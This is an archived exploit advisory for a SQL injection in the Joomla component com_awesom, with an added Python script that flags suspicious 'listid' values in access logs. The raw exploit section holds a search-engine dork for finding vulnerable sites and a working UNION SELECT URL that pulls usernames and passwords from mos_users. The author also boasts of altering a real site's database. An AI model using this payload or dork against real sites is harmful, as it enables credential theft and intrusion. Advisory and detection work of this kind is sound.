Vendor: com_awesom
By: S@BUN
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: com_awesom
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Joomla SQL Injection (com_awesom)

The Joomla component com_awesom is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'listid' parameter of the 'viewlist' task in the 'index.php' file. This allows the attacker to retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to update the com_awesom component to the latest version, or apply any patches or fixes provided by the vendor.
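
Until the component is updated or removed, web server access logs can be checked for requests that abuse the 'listid' parameter described above. The following is an added example, not part of the original advisory or the component's code: it flags com_awesom requests whose listid is anything other than a plain integer. The log lines are constructed samples in combined log format, and the integer-only rule for listid and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Feb/2008:10:00:01 +0000] "GET /index.php?option=com_awesom&Itemid=5&task=viewlist&listid=3 HTTP/1.1" 200 5120
198.51.100.9 - - [04/Feb/2008:10:00:05 +0000] "GET /index.php?option=com_awesom&Itemid=x&task=viewlist&listid=-1/**/union/**/select/**/null HTTP/1.1" 200 734
198.51.100.9 - - [04/Feb/2008:10:00:09 +0000] "GET /index.php?option=com_awesom&task=viewlist&listid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect HTTP/1.1" 200 731
203.0.113.4 - - [04/Feb/2008:10:01:00 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 9001
"""

# Client address and request target from one combined-log-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Assumption: a legitimate listid is a short non-negative integer.
LISTID_OK = re.compile(r"[0-9]{1,10}")


def suspicious_listid(log_text):
    """Return (client_ip, decoded_listid) for com_awesom requests
    whose listid value is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        client_ip, target = match.groups()
        # parse_qs percent-decodes values, so encoded payloads are compared decoded.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if not any(v.lower() == "com_awesom" for v in query.get("option", [])):
            continue
        # Every listid is checked, whatever the task, to also catch repeated parameters.
        for value in query.get("listid", []):
            if not LISTID_OK.fullmatch(value.strip()):
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for client_ip, value in suspicious_listid(SAMPLE_LOG):
        print(f"{client_ip} sent non-integer listid: {value!r}")
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the URL.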

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_awesom)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
#    DORKS 1 : allinurl :"com_awesom"
#
#   
#########################################################################   
# 
#    I changed ATATÜRK.com's db, so don't look
#
#   The ATATÜRK.com db has been changed and its user has been notified.
#
##########################################################################
EXPLOIT :

index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*


##########################################################################
# S@BUN                   www.hackturkiye.com               S@BUN
##########################################################################
# S@BUN                        GOOD LUCKY                    S@BUN
##########################################################################

	<name>Awesom</name>
	<creationDate>24/05/2004</creationDate>
	<author>Madd0</author>
	<copyright>This component is released under the GNU/GPL License</copyright>
	<authorEmail>madd0@users.sourceforge.net</authorEmail>

	<authorUrl>amazoop.sourceforge.net</authorUrl>
	<version>0.3.2</version>
	<description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you 
		create lists of products to feature on your Mambo-driven site.<br />
		These lists can be customized or can be automatically generated with information provided 
		by Amazon through Amazon Web Services.<br />
		Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon 
		using your associate ID in order to earn comissions.
	</description>

# milw0rm.com [2008-02-04]